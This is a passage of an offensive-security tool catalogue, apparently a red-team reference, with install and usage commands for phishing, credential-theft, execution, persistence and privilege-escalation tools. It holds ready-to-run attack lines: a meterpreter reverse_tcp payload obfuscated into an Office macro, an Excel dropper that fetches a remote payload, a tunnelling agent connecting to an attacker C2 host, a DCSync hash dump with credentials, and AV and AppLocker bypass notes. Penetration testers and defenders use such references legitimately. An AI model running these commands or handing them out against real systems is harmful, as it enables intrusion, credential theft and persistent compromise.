### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. GoPhish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing.
evilginx2 is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.

**Install:**

```bash
git clone https://github.com/fin3ss3g0d/evilgophish
```

**Usage:**

```
Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
```

![image](https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

This framework is great for creating campaigns for initial access: 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.

**Install:**

```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd social-engineering-toolkit; python setup.py install
```

**Usage:**

```bash
python3 setoolkit
```

![image](https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Nice tool for logon
brute force attacks. It can brute force a number of services including SSH, FTP, TELNET, HTTP, etc.

**Install:**

```bash
sudo apt install hydra
```

**Usage:**

```bash
# HTTP POST form: ^USER^ and ^PASS^ are substituted on each attempt; "Error" is the response string that marks a failed login
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username=^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh
```

![image](https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device Code authentication flow and QR codes (see [PhishInSuits](https://github.com/secureworks/PhishInSuits) for more about the OAuth Device Code flow for phishing attacks).

Attack Steps:

- Send malicious QR code to victim
- Victim scans QR code with mobile device
- Victim directed to attacker controlled server (triggering the OAuth Device Code authentication flow process)
- Victim emailed MFA code (triggering the OAuth Device Code flow 15 minute timer)
- Attacker polls for authentication
- Victim enters code into legitimate Microsoft website
- Attacker saves authentication token

**Install:**

```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
```

**Note:** *Before using either module, update the required information in the settings.config file noted with `Required`.*

**Usage (Email Module):**

```
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to
```

**Usage (Server Module):**

```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging
```

![image](https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png)

### [🔙](#tool-list)[King Phisher](https://github.com/securestate/king-phisher)

King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.

It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, attackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.

**Install (Linux - Client & Server):**

```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash ./install.sh
```

**Usage:**

Once King Phisher has been installed, please follow the [wiki page](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) to set up SSH, the database config, the SMTP server, etc.

![image](https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png)

Execution
====================

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.

The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot otherwise be resolved, the system will broadcast a request for the hostname to the local network using these protocols.
Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.

**Install:**

```bash
git clone https://github.com/SpiderLabs/Responder
cd Responder
```

**Usage:**

```bash
# Running the tool
./Responder.py [options]

# Typical usage
./Responder.py -I eth0 -wrf
```

Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).

![image](https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png)

*Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.

It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:

- Password hashes for local accounts
- Kerberos tickets and keys
- LSA Secrets

**Install:**

```bash
python3 -m pip install impacket
```

**Usage:**

```bash
# Extract NTLM hashes from local files (an NTDS.dit copy and the SYSTEM hive)
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# DCSync attack: dump the NTLM hashes of all domain users.
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
```

![image](https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png)

*Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: *a service that allows administrators to
remotely execute commands on a Windows machine*).

Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.

Some features include:

- Loading PowerShell scripts in memory
- Loading DLL files in memory, bypassing some AVs
- Loading x64 payloads
- Pass-the-hash support
- Uploading and downloading local and remote files

**Install: (Git)**

```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
```

**Install: (Ruby gem)**

```bash
gem install evil-winrm
```

Alternative installation instructions can be found [here](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**Usage:**

```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Inside the Evil-WinRM shell: upload local files to the victim
upload local_filename
upload local_filename destination_filename

# Download remote files to the local machine
download remote_filename
download remote_filename destination_filename

# Execute a .NET assembly in the victim's memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load a DLL library into the victim's memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
```

Full usage documentation can be found [here](https://github.com/Hackplayers/evil-winrm#documentation).

![image](https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png)

*Image used from https://korbinian-spielvogel.de/posts/heist-writeup/*

### [🔙](#tool-list)[Donut](https://github.com/TheWover/donut/)

A tool for in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies.
It can be used to load and run custom payloads on target systems without the need to drop files to disk.

**Install: (Windows)**

```bash
git clone http://github.com/thewover/donut.git
```

To generate the loader template, the dynamic library donut.dll, the static library donut.lib and the generator donut.exe, start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:

```bash
nmake -f Makefile.msvc
```

To do the same using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:

```bash
make -f Makefile.mingw
```

**Install: (Linux)**

```bash
pip3 install donut-shellcode
```

**Usage:**

```python
import donut

# Creating shellcode from an XSL file that pops up a calculator.
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

# Creating shellcode from an unmanaged DLL. Invokes DllMain.
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
```

For full usage information, see the Donut [GitHub page](https://github.com/TheWover/donut/#4-usage).

See [a recent blog post](https://thewover.github.io/Bear-Claw/) from The Wover for more info.

![image](https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

A tool used to automate the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.

**Install: (Binary)**

1. Get the latest binary from [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Download the binary on a PC with genuine Microsoft Office installed.
3. Open a console, cd to the binary directory and call the binary

**Install: (Git)**

```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
```

**Usage:**

```bash
# Help page
python3 macro_pack.py --help

# List all supported file formats
macro_pack.exe --listformats

# Obfuscate the VBA file generated by msfvenom and put the result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

# Obfuscate an Empire stager VBA file and generate an MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm

# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store it as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

# Execute calc.exe via a Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xlsx
```

![image](https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.

Some of the features of PowerSploit:

- Dump password hashes and extract clear-text passwords from memory
- Escalate privileges and bypass security controls
- Execute arbitrary PowerShell code and bypass execution restrictions
- Perform network reconnaissance and discovery
- Generate payloads and execute exploits

**Install:** *1. Save to PowerShell modules folder*

First you will need to download the [PowerSploit folder](https://github.com/PowerShellMafia/PowerSploit) and save it to your PowerShell modules folder.

Your PowerShell modules folder path can be found with the following command:

```powershell
$Env:PSModulePath
```

**Install:** *2. Install PowerSploit as a PowerShell module*

You will then need to install the PowerSploit module (use the name of the downloaded folder).

**Note:** *Your PowerShell execution policy might block you; to fix this, run the following command.*

```powershell
powershell.exe -ep bypass
```

Now you can install the PowerSploit module.

```powershell
Import-Module PowerSploit
```

**Usage:**

```powershell
Get-Command -Module PowerSploit
```

![image](https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.

Some of the features of Rubeus:

- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks

**Install: (Download)**

You can get the unofficial pre-compiled Rubeus binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).

**Install: (Compile)**

Rubeus is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the Rubeus [project .sln](https://github.com/GhostPack/Rubeus), choose "Release", and build.

**Usage:**

```
Rubeus.exe -h
```

![image](https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png)

### [🔙](#tool-list)[SharpUp](https://github.com/GhostPack/SharpUp)

A nice tool for checking a victim's endpoint for vulnerabilities relating to high integrity processes, groups, hijackable paths, etc.

**Install: (Download)**

You can get the unofficial pre-compiled SharpUp binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe).


**Install: (Compile)** 

SharpUp is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Open the SharpUp [project .sln](https://github.com/GhostPack/SharpUp), choose "Release", and build.

**Usage:** 

```bash
SharpUp.exe audit
#-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths
#-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths
#-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.
```

![image](https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.

This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the [wiki](https://github.com/skahwah/SQLRecon/wiki).

**Install: (Binary)** 

You can download the latest binary release from [here](https://github.com/skahwah/SQLRecon/releases).

**Usage:** 

```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
```

Full usage information can be found on the [wiki](https://github.com/skahwah/SQLRecon/wiki).

Tool module usage information can be found [here](https://github.com/skahwah/SQLRecon#usage).

![image](https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png)

*Image used from SQLRecon help page*

### [🔙](#tool-list)[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList)

This resource is a collection of the most common and well-known techniques to bypass AppLocker. 

Since AppLocker can be configured in different ways, [@api0cradle](https://github.com/api0cradle) maintains a verified list of bypasses (that work against the default AppLocker rules) and a list of possible bypass techniques (depending on configuration) or techniques claimed to be a bypass by someone. 

They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.

Indexed lists:

- [Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md)
- [VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md)
- [UnverifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md)
- [DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md)

![image](https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png)

*Image used from https://github.com/api0cradle/UltimateAppLockerByPassList*

### [🔙](#tool-list)[StarFighters](https://github.com/Cn33liz/StarFighters)

A JavaScript and VBScript based Empire launcher. Both launchers run within their own embedded PowerShell host, so PowerShell.exe is not needed. 

This might be useful when a company is blocking PowerShell.exe and/or is using an application whitelisting solution, but does not block running JS/VBS files.

**Usage:** 

- Set up a new listener within PowerShell Empire
- Use the Launcher command to generate a PowerShell launcher for this listener
- Copy and replace the Base64-encoded launcher payload within the StarFighter JavaScript or VBScript file

For the JavaScript version use the following variable: 

```javascript
var EncodedPayload = "<Paste Encoded Launcher Payload Here>"
```

For the VBScript version use the following variable: 

```vbscript
Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
```

- Then run `wscript.exe StarFighter.js` or `StarFighter.vbs` on the target, or double-click the launchers within Explorer.

![image](https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png)

*Image used from https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html*

### [🔙](#tool-list)[demiguise](https://github.com/nccgroup/demiguise)

The aim of this project is to generate .html files that contain an encrypted HTA file. 

The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. 

This is an evasion technique to get around content / file-type inspection implemented by some security appliances.

Further technical information [here](https://github.com/nccgroup/demiguise#how-does-it-do-it). 

**Install:** 

```bash
git clone https://github.com/nccgroup/demiguise
cd demiguise
```

**Usage:** 

```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta
```

![image](https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png)

*Image used from https://github.com/nccgroup/demiguise*

## [🔙](#tool-list)[PowerZure](https://github.com/hausec/PowerZure)

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

There is zero reason to ever run PowerZure on a victim’s machine. Authentication is done using an existing accesstoken.json file or via the login prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your own machine.

**Install:** 

```powershell
Install-Module -Name Az
git clone https://github.com/hausec/PowerZure
cd PowerZure
ipmo C:\path\to\PowerZure.psd1
```

**Usage:** 

```powershell
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget
```

[Blog - Attacking Azure, Azure AD, and Introducing PowerZure](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)

![image](https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png)

*Image used from https://hakin9.org*


Persistence
====================

### [🔙](#tool-list)[Impacket](https://github.com/fortra/impacket)

Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks
such as dumping password hashes and creating network shares.

It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.

**Install:** 

```bash
python3 -m pip install impacket
```

**Install: (With Example Scripts)** 

Download and extract [the package](https://github.com/fortra/impacket), then navigate to the install folder and run:

```bash
python3 -m pip install .
```

**Usage:** 

```bash
# Extract NTLM hashes from local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Get a list of the sessions opened at the remote hosts
netview.py domain/user:password -target 192.168.10.2

# Retrieve the MSSQL instance names from the target host.
mssqlinstance.py 192.168.1.2

# This script will gather data about the domain's users and their corresponding email addresses.
GetADUsers.py domain/user:password@IP
```

Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) for Impacket usage.

![image](https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.

Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.

Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.

**Install:** 

```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
```

**Usage:** 

```bash
# Start Empire
./empire

# List live agents
list agents

# List live listeners
list listeners
```

Nice usage [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) by [HarmJ0y](https://github.com/HarmJ0y).

![image](https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

A Windows persistence toolkit written in C#.

The project has a [wiki](https://github.com/mandiant/SharPersist/wiki).

**Install: (Binary)** 

You can find the most recent release [here](https://github.com/mandiant/SharPersist/releases).

**Install: (Compile)** 

- Download the project files from the [GitHub repo](https://github.com/mandiant/SharPersist).
- Load the Visual Studio project and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- Go to "NuGet Package Manager" --> "Package Sources"
- Add a package source with the URL "https://api.nuget.org/v3/index.json"
- Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed so that you do not need Visual Studio 2019.
    - `Install-Package Costura.Fody -Version 3.3.3`
- Install the TaskScheduler package
    - `Install-Package TaskScheduler -Version 2.8.11`
- You can now build the project yourself!

**Usage:**

A full list of usage examples can be found [here](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).

```powershell
# KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

# Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

# Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

# Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
```

![image](https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png)

### [🔙](#tool-list)[ligolo-ng](https://github.com/nicocha30/ligolo-ng)

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using [gVisor](https://gvisor.dev/).

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

**Install: (Download)** 

Precompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/nicocha30/ligolo-ng/releases).

**Install: (Build)** 

*Building ligolo-ng (Go >= 1.17 is required):*

```bash
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go

# Build for Windows
GOOS=windows go build -o agent.exe cmd/agent/main.go
GOOS=windows go build -o proxy.exe cmd/proxy/main.go
```

**Setup: (Linux)** 

```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
```

**Setup: (Windows)** 

You need to download the [Wintun](https://www.wintun.net/) driver (used by [WireGuard](https://www.wireguard.com/)) and place the `wintun.dll` in the same folder as Ligolo (make sure you use the right architecture).

**Setup: (Proxy server)** 

```bash
./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificates
```

**Usage:**

*Start the agent on your target (victim) computer (no privileges are required!):*

```bash
./agent -connect attacker_c2_server.com:11601
```

A session should appear on the proxy server.

```
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
```

Use the session command to select the agent.

```
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
```

Full usage information can be found [here](https://github.com/nicocha30/ligolo-ng#using-ligolo-ng).

![image](https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png)

*Image used from https://github.com/nicocha30/ligolo-ng#demo*

Privilege Escalation
====================

### [🔙](#tool-list)[Crassus](https://github.com/vu-ls/Crassus)

"Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files.
The ACLs used by files and directories of privileged processes can find more than just looking for missing files to achieve the goal." - [Link](https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus)

**Install: (Build)** 

Crassus was developed as a Visual Studio 2019 project. To build Crassus.exe:

1. Open Crassus.sln
2. Press Ctrl+Shift+B on your keyboard

**Install: (precompiled)** 

If you trust running other people's code without knowing what it does, Crassus.exe is [provided in this repository](https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe).

**Usage:** 

1. In [Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon), select the `Enable Boot Logging` option. 
2. Reboot.
3. Once you have logged in and Windows has settled, optionally also run [scheduled tasks that may be configured to run with privileges](https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c).
4. Run Process Monitor once again.
5. When prompted, save the boot log.
6. Reset the default Process Monitor filter using `Ctrl-R`.
7. Save this log file, e.g., to `boot.PML`. The reason for re-saving the log file is twofold:
    1. Older versions of Process Monitor do not save boot logs as a single file.
    2. Boot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of Process Monitor itself.

![Crassus](https://github.com/user-attachments/assets/0194b7bf-80ee-44cd-a576-22bc6888de8a)

*Image used from https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots*

### [🔙](#tool-list)[LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)

LinPEAS is a nice, verbose privilege escalation script for finding local privesc routes on Linux endpoints. 

**Install + Usage:**

```bash
curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh
```

![image](https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS is a nice, verbose privilege escalation script for finding local privesc routes on Windows endpoints. 

**Install + Usage:** 

```powershell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
```

![image](https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png)

### [🔙](#tool-list)[linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration)

Linux smart enumeration is another good, less verbose Linux privesc tool.

**Install + Usage:** 

```bash
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
```

![image](https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.

**Key features of Certify:**
 
- Certificate creation
- Certificate signing
- Certificate import
- Certificate trust modification

**Install: (Compile)** 

Certify is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the Certify project [.sln](https://github.com/GhostPack/Certify), choose "Release", and build.

**Install: (Running Certify Through PowerShell)** 

If you want to run Certify in-memory through a PowerShell wrapper, first compile Certify and base64-encode the resulting assembly:

```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt
```

Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):

```powershell
$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))
```

The Main() method and any arguments can then be invoked as follows:

```powershell
[Certify.Program]::Main("find /vulnerable".Split())
```

Full compile instructions can be found [here](https://github.com/GhostPack/Certify#compile-instructions).

**Usage:** 

```bash
# See if there are any vulnerable templates
Certify.exe find /vulnerable

# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin
```

Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword is a PowerShell script that is part of the PowerSploit toolkit; it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).

Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.

**Install:** 

Follow the PowerSploit [installation instructions](https://github.com/A-poc/RedTeam-Tools#powersploit) from this tool sheet.

```powershell
powershell.exe -ep bypass
Import-Module PowerSploit
```

**Usage:** 

```powershell
# Get all passwords with additional information
Get-GPPPassword

# Get list of all passwords
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Unique
```

![image](https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

*Supports:*

- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
